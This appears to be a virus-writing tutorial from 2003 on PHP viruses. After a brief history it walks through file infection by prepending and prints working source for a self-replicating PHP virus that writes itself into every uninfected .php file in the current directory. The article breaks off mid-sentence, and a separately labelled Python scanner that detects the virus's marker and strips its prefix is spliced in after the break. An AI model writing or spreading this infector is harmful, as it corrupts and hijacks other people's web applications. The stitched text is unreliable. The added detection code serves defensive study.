WARNING: THIS IS FOR EDUCATIONAL PURPOSES ONLY! I AM NOT RESPONSIBLE FOR HOW YOU USE THIS INFORMATION!!!!!
0) Intro Words
PHP, short for 'Hypertext Preprocessor', is a very common scripting language for the world-wide web. You can do nearly everything internet-related with that language. That means you are also able to write viruses in it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was written in October 2000 and was released in 29A#5. It was no real virus, rather a companion: it writes to every PHP file in the current directory a line which lets the victim run the virus, but the host itself doesn't contain the virus. After searching for something about PHP viruses I found out that there is no high-tech PHP virus out so far, because all the viruses I could find are rips of PHP.Pirus (using the same principle). That was my inspiration for writing such an article. I wanted to make something totally new, and I guess I had success. I tested every source with PHP 4.3.3, and everything worked fine. Now go on reading this and learn something about PHP viruses!
1) File Infection
That's maybe the most important thing when you want to make a PHP virus, therefore I want to explain to you how you can infect files with PHP. It should be no problem to understand the examples, because I tried to make them as simple as possible. When this article was written (autumn 2003), there was no real file infector out there. The only interesting PHP virus so far is MaskBits' PHP.Pirus, which doesn't infect files but uses the command 'include' so that the virus is executed in every PHP file in the current dir. You may think 'Why does he tell me this?'. I don't know, just for fun. Now let me explain to you how to infect files.
a) Prepending
A prepender copies its code in front of the victim's code, therefore it will be executed before the victim. That's the main idea of this kind of infection. But there are some other important things you have to note: to get the virus out of the file, you need some information about where the virus is. In my example the virus uses the first 391 bytes. The next important thing is that you must not infect a file twice. What to do against that? Check if the file is already infected. In the following example the virus searches in the first 13 bytes (in an infected file it's this code: '
PHP Prepender Virus Example
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file));
}
fclose($victim);
}
}
closedir($curdir);
?>
As this is a really easy virus, you should understand it quickly just by looking at it. Now I'm going to give you the most important things the example does:
Reading the first 391 bytes (which is exactly the virus size)
Searches for every .PHP file in the current directory
If not infected, reading the victim
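A defender-side check for the prepender pattern described above, added here as an example and not code from the original article: it flags .php files that carry the marker the sample looks for ('SPTH' within the first 13 bytes) and recovers the host by cutting off the fixed 391-byte prefix the article states. Marker, window and prefix length are parameters since other prependers use other values; the sample files are constructed, and the stand-in prefix is an inert PHP comment rather than the article's code.

```python
import tempfile
from pathlib import Path

# Values taken from the article's sample: marker, inspected window, prepended size.
MARKER = b"SPTH"
WINDOW = 13
PREFIX_LEN = 391


def is_prepended(head: bytes, marker: bytes = MARKER, window: int = WINDOW) -> bool:
    """True if the infection marker sits inside the leading `window` bytes."""
    return marker in head[:window]


def recover_host(data: bytes, prefix_len: int = PREFIX_LEN) -> bytes:
    """Remove the fixed-length prepended block; what remains is the original host."""
    return data[prefix_len:]


def scan_tree(root: str) -> dict:
    """Map every .php file under `root` to whether its head carries the marker."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        with open(path, "rb") as fh:
            hits[path.name] = is_prepended(fh.read(WINDOW))
    return hits


def build_samples(root: str) -> bytes:
    """Write one clean and one marked .php file (constructed data) and return the host."""
    host = b"<?php\necho 'hello';\n?>\n"
    # Inert stand-in for the 391-byte prepended block: a PHP comment carrying the marker.
    prefix = b"<?php /*SPTH".ljust(PREFIX_LEN - 4, b"-") + b"*/?>"
    assert len(prefix) == PREFIX_LEN
    Path(root, "clean.php").write_bytes(host)
    Path(root, "marked.php").write_bytes(prefix + host)
    return host


def demo() -> dict:
    """Scan a temporary tree and check that the host comes back out of the marked file."""
    with tempfile.TemporaryDirectory() as root:
        host = build_samples(root)
        hits = scan_tree(root)
        recovered = recover_host(Path(root, "marked.php").read_bytes())
        return {"hits": hits, "host_recovered": recovered == host}


if __name__ == "__main__":
    print(demo())
```

Recovery only works when the prefix length is exactly right, so compare the recovered host against a backup or check that it still parses before overwriting anything.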